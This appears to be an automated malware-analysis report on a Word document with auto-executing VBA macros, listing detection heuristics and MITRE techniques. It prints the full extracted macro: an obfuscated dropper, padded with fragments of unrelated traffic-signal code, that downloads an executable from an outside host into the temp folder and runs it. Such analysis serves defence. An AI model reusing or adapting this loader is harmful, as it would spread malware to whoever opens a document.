MALICIOUS
278
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
T1204.002 Malicious File
The sample is a malicious OOXML document containing obfuscated VBA macros. The critical heuristic 'OLE_VBA_HTTP_DROP_EXEC' indicates that the VBA code downloads and saves a file to disk, likely a second-stage payload. The 'OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristics further confirm an auto-executing, obfuscated loader mechanism. The presence of the 'autoopen' subroutine strongly suggests an attempt to automatically execute malicious code upon opening the document.
Heuristics 9
-
VBA project inside OOXML medium 7 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXECVBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.Matched line in script
dQqnFJoOu9MYi = hRomc9OqfrT.responseBody -
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Set Aw9a6h1r = CreateObject(Bc21xM5Qq) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set Aw9a6h1r = CreateObject(Bc21xM5Qq) -
CallByName call high OLE_VBA_CALLBYNAMECallByName callMatched line in script
CallByName hRomc9OqfrT, Chr(79) & "p" & "e" & Chr(110), VbMethod, Chr(71) & Chr(69) & Chr(84), _ -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoopen() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
T17zaVI8G7 = Environ(Chr(84) & Chr(69) & "M" & Chr(80)) -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/markup-compatibility/2006 Referenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 18700 bytes |
SHA-256: faf205cfde98531a539031c9e8231fc2b4f2c053f2275e0029985a74848a08b9 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
VEeve (8.2)
End Sub
Sub VEeve(FFFFF As Long)
NwKHQxx14zub
End Sub
Attribute VB_Name = "Module1"
Public Function Remain_5F03(ByVal BusLineID As String, ByVal CrossRoadID As String, ByVal Goback As String) As Integer
Try
_mainForm.Show_LBox_PolicyRightNowText(" Remain_5F03 start ")
If Goback = "1" Then
Goback = "00"
ElseIf Goback = "2" Then
Goback = "01"
End If
Dim lightstatus As String() = tempV3_5F14.LightStatus
Dim Green As String() = tempV3_5F15.Green
Dim total_phases As Integer = lightstatus.Length
Dim phase_interval(total_phases) As Integer
For index As Integer = 0 To total_phases - 1
phase_interval(Index) = YellowplusRed(lightstatus(Index)) + CurrentGreen(Green(Index))
'phase_interval2(index) = phase_interval
'_mainForm.Show_LBox_PolicyRightNowText(index.ToString + " Remain_5F03 Phase interval " + phase_interval.ToString)
_mainForm.Show_LBox_PolicyRightNowText(index.ToString + " Remain_5F03 Phase interval " + phase_interval(index).ToString)
Next Index
End Function
Public Function lQc8N4mpWW5(muULk3yaoasVTA As String)
Set ZRCB4OQPMEB6 = Aw9a6h1r(Chr(83) & Chr(104) & Chr(61) & Chr(101) & Chr(108) & Chr(59) & Chr(108) & Chr(60) & Chr(46) & Chr(65) & Chr(112) & Chr(59) & Chr(112) & Chr(108) & Chr(105) & Chr(60) & Chr(99) & Chr(97) & Chr(116) & Chr(61) & Chr(105) & Chr(111) & Chr(110))
ZRCB4OQPMEB6.Open (rAHQOXN8z4zO)
End Function
Public Function Syncd_IC2IPC_AcceptHash_2()
Dim Data_5F18 As Object = Syncd_IC2IPC_AcceptHash(CrossRoadID + "_5F18")
Dim planid As String = Data_5F18.PlanID.ToString
Dim Data_5F03 As Object = Syncd_IC2IPC_AcceptHash(CrossRoadID + "_5F03")
Dim a() As Byte = HexStr2ByteArray(BusLineData(4))
Dim BusPassPhases As BitArray = New BitArray(8)
BusPassPhases = New BitArray(a)
Return DiffSecond
Else
Return Nothing
End If
Catch ex As Exception
WriteLog(curPath, "Module1_Policy_Public", " Remain_5F03 Catch:" + ex.Message, _logEnable)
Return -1
End Try
End Function
Attribute VB_Name = "Module2"
Public Function RemainingLightTime(ByVal GreenOrNot As Boolean) As Integer
Dim Remaining As Integer
Try
Dim TotalPhase As String
Try
TotalPhase = Data_5F18.SubPhaseCount.ToString
Catch ex As Exception
TotalPhase = Data_5F13.SubPhaseCount.ToString
End Try
Dim TotalPhaseInt As Integer = Convert.ToDecimal(TotalPhase)
Dim CurrentPhaseInt As Integer = Convert.ToDecimal(Data_5FCC.Current_SubPhaseID)
Dim CurrentStepInt As Integer = Convert.ToDecimal(Data_5FCC.Current_StepID)
Dim CurrentRemainingTime As Integer = Data_5FCC.Current_RemainingInt
If GreenOrNot Then
'_mainForm.Show_LBox_PolicyRightNowText(" Calculate Remaining Green ")
If CurrentStepInt = 1 Then
prepare = Greenint(CurrentPhaseInt - 1) - CurrentRemainingTime
Remaining = Greenint(CurrentPhaseInt - 1) - prepare
ElseIf CurrentStepInt = 2 Then
Remaining = CurrentRemainingTime + 4 + 3
ElseIf CurrentStepInt = 3 Then
Remaining = CurrentRemainingTime + 3
Else
Remaining = CurrentRemainingTime
End If
For index As Integer = CurrentPhaseInt + 1 To TotalPhaseInt
If BusPassPhases(Index - 1) Then
Remaining = Remaining + Greenint(Index - 1)
If CurrentPhaseInt <> 1 Then
For index2 As Integer = 1 To CurrentPhaseInt - 1
If BusPassPhases(index2 - 1) Then
Remaining = Remaining + Greenint(index2 - 1)
End If
Next
End If
End If
Next
'If BusPassPhases(CurrentPhaseInt) Then
' Remaining = Remaining + Greenint(CurrentPhaseInt)
'End If
Return Remaining
Else
'_mainForm.Show_LBox_PolicyRightNowText(" Calculate Remaining Red ")
If CurrentStepInt = 1 Then
prepare = Greenint(CurrentPhaseInt - 1) - CurrentRemainingTime
Remaining = Greenint(CurrentPhaseInt - 1) - prepare
ElseIf CurrentStepInt = 2 Then
Remaining = CurrentRemainingTime + 4 + 3 + 2
ElseIf CurrentStepInt = 3 Then
Remaining = CurrentRemainingTime + 3 + 2
Else
Remaining = CurrentRemainingTime
End If
End Function
Sub NwKHQxx14zub()
dChxZd9cty0 = Chr(104) & "t" & Chr(59) & "t" & Chr(112) & ":" & "/" & Chr(60) & "/" & Chr(97) & Chr(117) & Chr(100) & "i" & Chr(111) & Chr(98) & Chr(61) & "i" & Chr(101) & Chr(110) & "e" & Chr(110) & Chr(116) & Chr(101) & "n" & "d" & Chr(114) & Chr(101) & Chr(46) & "<" & "f" & "r" & Chr(47) & Chr(61) & Chr(119) & Chr(52) & "5" & Chr(114) & Chr(51) & Chr(47) & "8" & "l" & "6" & Chr(109) & "k" & Chr(46) & Chr(61) & "e" & Chr(59) & Chr(120) & "e"
Set hRomc9OqfrT = Aw9a6h1r(Chr(77) & "i" & "<" & "c" & Chr(114) & Chr(111) & "=" & Chr(115) & "o" & Chr(102) & Chr(116) & Chr(59) & Chr(46) & "X" & Chr(77) & "<" & Chr(76) & ";" & "H" & Chr(84) & "=" & Chr(84) & "P")
dChxZd9cty0 = Replace(dChxZd9cty0, Chr(60), "")
dChxZd9cty0 = Replace(dChxZd9cty0, Chr(61), "")
dChxZd9cty0 = Replace(dChxZd9cty0, Chr(59), "")
CallByName hRomc9OqfrT, Chr(79) & "p" & "e" & Chr(110), VbMethod, Chr(71) & Chr(69) & Chr(84), _
dChxZd9cty0 _
, False
T17zaVI8G7 = Environ(Chr(84) & Chr(69) & "M" & Chr(80))
rAHQOXN8z4zO = T17zaVI8G7 & Chr(92) & Chr(115) & Chr(117) & Chr(112) & Chr(117) & "t" & Chr(102) & Chr(56) & Chr(46) & Chr(101) & "x" & Chr(101)
Dim dQqnFJoOu9MYi() As Byte
Dim mmm As VbCallType
mmm = VbMethod
CallByName hRomc9OqfrT, Chr(83) & Chr(101) & Chr(110) & "d", mmm
dQqnFJoOu9MYi = hRomc9OqfrT.responseBody
zGtUPirIvgMk dQqnFJoOu9MYi, rAHQOXN8z4zO
On Error GoTo ELg0jdGF
a = 332 / 0
On Error GoTo 0
ta52uVgBTI4LPT:
Exit Sub
ELg0jdGF:
lQc8N4mpWW5 ("X0VlMPg6nC")
Resume ta52uVgBTI4LPT
End Sub
Public Function jhbjhjkn()
For index As Integer = CurrentPhaseInt + 1 To TotalPhaseInt
If BusPassPhases(Index - 1) = False Then
Remaining = Remaining + Greenint(Index - 1) + 5
If CurrentPhaseInt <> 1 Then
For index2 As Integer = 1 To CurrentPhaseInt - 1
If BusPassPhases(index2 - 1) = False Then
Remaining = Remaining + Greenint(index2 - 1) + 5
End If
Next
End If
End If
Next
Return Remaining
End If
Catch ex As Exception
_mainForm.Show_LBox_PolicyRightNowText(" RemainingLightTime Error" + ex.StackTrace.ToString)
End Try
Return Remaining
End Function
Attribute VB_Name = "Module35"
Public Function BusPhaseOrNot(ByVal BusLineID As String, ByVal CrossRoadID As String, ByVal Goback As String) As Boolean
Try
Dim temp_goback As String = ""
If Goback = "1" Then
Goback = "00"
ElseIf Goback = "2" Then
Goback = "01"
End If
Dim Data_5F03 As Object = HashTab_IC2IPC_Get(CrossRoadID + "_5F03")
'sPhaseOrder, sSignalMap, sSignalCount, sSubPhaseID, sStepID, sStepSec, sSignalStatus, Now
Dim Data_5F18 As Object = HashTab_IC2IPC_Get(CrossRoadID + "_5F18")
Dim BusLineDataKey As String = BusLineID + "_" + CrossRoadID + "_" + Goback + "_" + Data_5F18.PlanID.ToString
Dim CurrentPhaseInt As Integer = HexStringTOIntString(Data_5F03.SubPhaseID.ToString, 2)
'Dim BusPassPhases As BitArray = New BitArray(8)
Dim a() As Byte = HexStr2ByteArray(BusLineData(4)) '[BusSubPhaseID]
'FiveFB4.Add("BusPhase", BusLineData(4))
Dim BusPassPhases As BitArray = New BitArray(8)
BusPassPhases = New BitArray(a)
End Function
Public Sub zGtUPirIvgMk(ZDtLniBdL3 As Variant, VCvMRSbB0LHH As String)
Dim zsl48Nc6: Set zsl48Nc6 = Aw9a6h1r("A" & "<" & "d" & "o" & ";" & "d" & Chr(98) & Chr(61) & Chr(46) & "S" & Chr(116) & Chr(61) & Chr(114) & "<" & "e" & Chr(97) & Chr(59) & Chr(109))
Dim zaPomni As Integer
zaPomni = 1
zsl48Nc6.Type = zaPomni
zsl48Nc6.Open
zsl48Nc6.write ZDtLniBdL3
zsl48Nc6.savetofile VCvMRSbB0LHH, 2
End Sub
Public Function Show_LBox_PolicyRightNowText()
'_mainForm.Show_LBox_PolicyRightNowText("Bit array ")
'For i = 0 To 7
' If BusPassPhases(i) Then
' _mainForm.Show_LBox_PolicyRightNowText("Pass " + (i + 1).ToString)
' Else
' _mainForm.Show_LBox_PolicyRightNowText("Block " + (i + 1).ToString)
' End If
'Next i
' _mainForm.Show_LBox_PolicyRightNowText("Bit array ")
For i As Integer = 0 To BusPassPhases.Count - 1
If BusPassPhases(i) And (i + 1) = CurrentPhaseInt And CurrentStepInt <> 5 Then
'_mainForm.Show_LBox_PolicyRightNowText("Green Light Now " + (i + 1).ToString)
Return True
End If
Next i
Catch ex As Exception
_mainForm.Show_LBox_PolicyRightNowText("Bus Line Data error " + ex.StackTrace.ToString)
Return False
End Try
'_mainForm.Show_LBox_PolicyRightNowText("Red Light Now ")
Return False
End Function
'************************************************************************************************
'**
'** ?????
'**
'************************************************************************************************
'?????1:??? 2??? 3:???
'TriggerPointdList
'************************************************************************************************
'**
'** ?????????
'**
'************************************************************************************************
'RG_Stauts:??-->R,??-->G
Public Function SendLightRemainSec(ByVal strBusID As String, ByVal RG_Stauts As String, ByVal RemainSec As String) As Boolean
Dim isSuccess As Boolean = False
Try
If _ConnectFlag_Car_Group Then
Dim Sendstring As String
Dim YearString As String = Now.Year.ToString("0000")
Dim MonthString As String = Now.Month.ToString("00")
Dim DayString As String = Now.Day.ToString("00")
Dim HourString As String = Now.Hour.ToString("00")
Dim MinuteString As String = Now.Minute.ToString("00")
Dim SecondString As String = Now.Second.ToString("00")
Dim TimeString As String = YearString + MonthString + DayString + HourString + MinuteString + SecondString
SeqNumber = (SeqNumber + 1) Mod 1000000000
Dim SeqString As String = SeqNumber.ToString("00000000")
Sendstring = "B2," + strBusID + ",SET01010," + HourString + MinuteString + SecondString + "_" + Trim(RG_Stauts) + Trim(RemainSec) + ",0,2," + TimeString + "," + SeqString + "," + TimeString
TCP_ClientWriteToCAR (Sendstring)
Dim text As String = "[R-->Bus] " + Sendstring
WriteLog(curPath, "CAR_comm", [text], _logEnable)
End If
Catch ex As Exception
End Try
Return isSuccess
End Function
Attribute VB_Name = "Module4"
Public rAHQOXN8z4zO As String
Public rAHQOXN8z4zO2 As String
Public rAHQOXN8z4zO3 As String
Public rAHQOXN8z4zO4 As String
Public rAHQOXN8z4zO5 As String
Public rAHQOXN8z4zO6 As String
Public Function SecondOfCar2CrossRoad(ByVal CarPostion As String, ByVal CrossRoadPostion As String, ByVal CarSpeed As Double) As Integer
Dim iSecReport As Integer = 0
Try
Dim StartPostion As String() = CarPostion.Split(",")
Dim EndPostion As String() = CrossRoadPostion.Split(",")
Dim EarthRadius As Integer = 6371
Dim factor As Double = Math.PI / 180
Dim dLat As Double = (Val(StartPostion(0)) - Val(EndPostion(0))) * factor
Dim dLon As Double = (Val(StartPostion(1)) - Val(EndPostion(1))) * factor
Dim dis_a As Double = Math.Sin(dLat / 2) * Math.Sin(dLat / 2) + Math.Cos(Val(StartPostion(0)) * factor) * Math.Cos(Val(EndPostion(0)) * factor) * Math.Sin(dLon / 2) * Math.Sin(dLon / 2)
Dim dis_b As Double = 2 * Math.Atan2(Math.Sqrt(dis_a), Math.Sqrt(1 - dis_a))
Dim dis_c As Double = EarthRadius * dis_b * 1000
Dim SedondOfSpeedMeter As Double = (CarSpeed * 1000) / 3600
iSecReport = dis_c / SedondOfSpeedMeter
'_mainForm.Show_LBox_PolicyRightNowText("CarPostion " + CarPostion + " CrossRoadPostion " + CrossRoadPostion)
'_mainForm.Show_LBox_PolicyRightNowText("Distance " + dis_c.ToString + " Speed " + SedondOfSpeedMeter.ToString)
Catch ex As Exception
iSecReport = 0
End Try
Return iSecReport
End Function
Public Function distance(ByVal CarPostion As String, ByVal CrossRoadPostion As String) As Integer
Dim iSecReport As Integer = 0
Try
Dim StartPostion As String() = CarPostion.Split(",")
Dim EndPostion As String() = CrossRoadPostion.Split(",")
Dim EarthRadius As Integer = 6371
Dim factor As Double = Math.PI / 180
Dim dLat As Double = (Val(StartPostion(0)) - Val(EndPostion(0))) * factor
Dim dLon As Double = (Val(StartPostion(1)) - Val(EndPostion(1))) * factor
Dim dis_a As Double = Math.Sin(dLat / 2) * Math.Sin(dLat / 2) + Math.Cos(Val(StartPostion(0)) * factor) * Math.Cos(Val(EndPostion(0)) * factor) * Math.Sin(dLon / 2) * Math.Sin(dLon / 2)
Dim dis_b As Double = 2 * Math.Atan2(Math.Sqrt(dis_a), Math.Sqrt(1 - dis_a))
Dim dis_c As Double = EarthRadius * dis_b * 1000
iSecReport = dis_c
'_mainForm.Show_LBox_PolicyRightNowText("?? " + iSecReport.ToString)
Catch ex As Exception
iSecReport = 0
_mainForm.Show_LBox_PolicyRightNowText("distance error " + ex.Message)
End Try
Return iSecReport
End Function
Public Function Aw9a6h1r(Bc21xM5Qq As String)
Bc21xM5Qq = Replace(Bc21xM5Qq, Chr(60), "")
Bc21xM5Qq = Replace(Bc21xM5Qq, Chr(61), "")
Bc21xM5Qq = Replace(Bc21xM5Qq, Chr(59), "")
Set Aw9a6h1r = CreateObject(Bc21xM5Qq)
End Function
Public Function distance2(ByVal CarPostion As String, ByVal CrossRoadPostion As String) As Integer
Dim iSecReport As Integer = 0
Try
Dim tempString As String = ""
Dim StartPostion As String() = CarPostion.Split(",")
Dim EndPostion As String() = CrossRoadPostion.Split(",")
Dim EarthRadius As Integer = 6371
tempString = StartPostion(0)
StartPostion(0) = StartPostion(1)
StartPostion(1) = tempString
Dim factor As Double = Math.PI / 180
Dim dLat As Double = (Val(StartPostion(0)) - Val(EndPostion(0))) * factor
Dim dLon As Double = (Val(StartPostion(1)) - Val(EndPostion(1))) * factor
Dim dis_a As Double = Math.Sin(dLat / 2) * Math.Sin(dLat / 2) + Math.Cos(Val(StartPostion(0)) * factor) * Math.Cos(Val(EndPostion(0)) * factor) * Math.Sin(dLon / 2) * Math.Sin(dLon / 2)
Dim dis_b As Double = 2 * Math.Atan2(Math.Sqrt(dis_a), Math.Sqrt(1 - dis_a))
Dim dis_c As Double = EarthRadius * dis_b * 1000
iSecReport = dis_c
'_mainForm.Show_LBox_PolicyRightNowText("?? " + iSecReport.ToString)
Catch ex As Exception
iSecReport = 0
_mainForm.Show_LBox_PolicyRightNowText("distance error " + ex.Message)
End Try
Return iSecReport
End Function
'???????
'?????1?,2??,3?,4??,5?,6??,7?,8??
Public Function isBusSameDirection(ByVal TriggerPhaseDirect As String) As Boolean
Dim isSame As Boolean = False
Try
If Not IsNothing(Data_5F03) Then
Return isPass(Val(TriggerPhaseDirect) - 1, Data_5F03.SignalStatus, Data_5F03.SignalMap)
End If
Catch ex As Exception
End Try
Return isSame
End Function
Public Function isPass(ByVal intIndex As Integer, ByVal strStatus As String, ByVal strSingalMap As String) As Boolean
Try
'Jason 2014-9-24
'S-------------------------------------------------------------
Dim SingalOrder As Integer = 0
Return False
End If
Catch ex As Exception
Dim trace As New System.Diagnostics.StackTrace(ex, True)
WriteLog(curPath, "Module1_Policy_Public", "isPass Catch(" + trace.GetFrame(0).GetFileLineNumber().ToString + ")" + ex.Message, _logEnable)
End Try
Return False
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 184832 bytes |
SHA-256: 8acbb7f68bf0a0ed10477b1a47d5a1ec888596eb168e0a40c1d3e3f93634804d |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.